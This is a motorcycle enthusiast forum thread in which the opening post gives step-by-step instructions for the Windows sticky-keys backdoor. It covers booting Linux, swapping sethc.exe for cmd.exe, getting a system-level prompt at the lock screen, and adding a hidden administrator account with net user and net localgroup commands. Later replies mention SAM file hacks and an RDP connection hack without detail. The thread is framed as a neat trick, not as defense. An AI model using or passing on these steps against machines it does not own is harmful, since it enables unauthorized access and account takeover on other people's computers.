Yamaha R1 Forum: YZF-R1 Forums banner
1 - 4 of 4 Posts

· Super Moderator
11,980 Posts
Discussion Starter · #1 ·
I?m not sure if you knew about this. A friend of mine just showed it to me, and it works in XP and Vistahttp://www.lockergnome.com/windows/2008/01/08/very-interesting-windows-thing/#
When you hit the shift key five times, windows opens sethc.exe to display the sticky keys menu ? even when the computer is logged off/locked. This will replace the sethc executable with a command prompt that will run at elevated privileges since there is no user logged in:
  1. Download, burn, and boot off of Backtrack Linux or something else with RW NTFS support.
  2. Mount your file system (mkdir /mnt/winderz && mount -t captive-ntfs /dev/hda1 /mnt/winderz)
  3. Move %SYSTEMROOT%\system32\sethc.exe to %SYSTEMROOT%\system32\sethc.exe.old
  4. Copy %SYSTEMROOT%\system32\cmd.exe to %SYSTEMROOT%\system32\sethc.exe
  5. Reboot into Windows; at login press shift 5 times in a row to activate sticky keys (sethc.exe), which should pop up a system level command prompt.
  6. Use the Net command to add a new user and add them to the administrator group? (net user newuser newpassword /ADD) and (net localgroup administrators newuser /ADD)
  7. Log in with your new user name and password!

· R1 Addiction
16,761 Posts
for those of us that aren't computer morons, but not computer guru's either.....what does this do?

· SO FAST SO CLEAN
10,209 Posts
There is an easier hack to the SAM file than going thru everything you just listed. The big problem you have with VISTA, and XP with Genuine, is it invalidates your OS and you can't update XP anymore. VISTA will simply start to shut several services off...permanently. I would stay away from hacks into the SAM file with the way geniune works. If you are never going to hook the system back up to the Internet after you hack it, then it isn't a problem.

· El Assholio Supremo del Mundo
10,685 Posts
everything on lockergnome is merely a repost of someone ele's work.
the guy is a tool.
and yes, i've met him several times.

Want a really useful "hack" do the one that allows you to allow multiple concurrent connections via rdp to your vista machine, including enabling rdp hosting from home premium.

that at least is useful.

1 - 4 of 4 Posts
This is an older thread, you may not receive a response, and could be reviving an old thread. Please consider creating a new thread.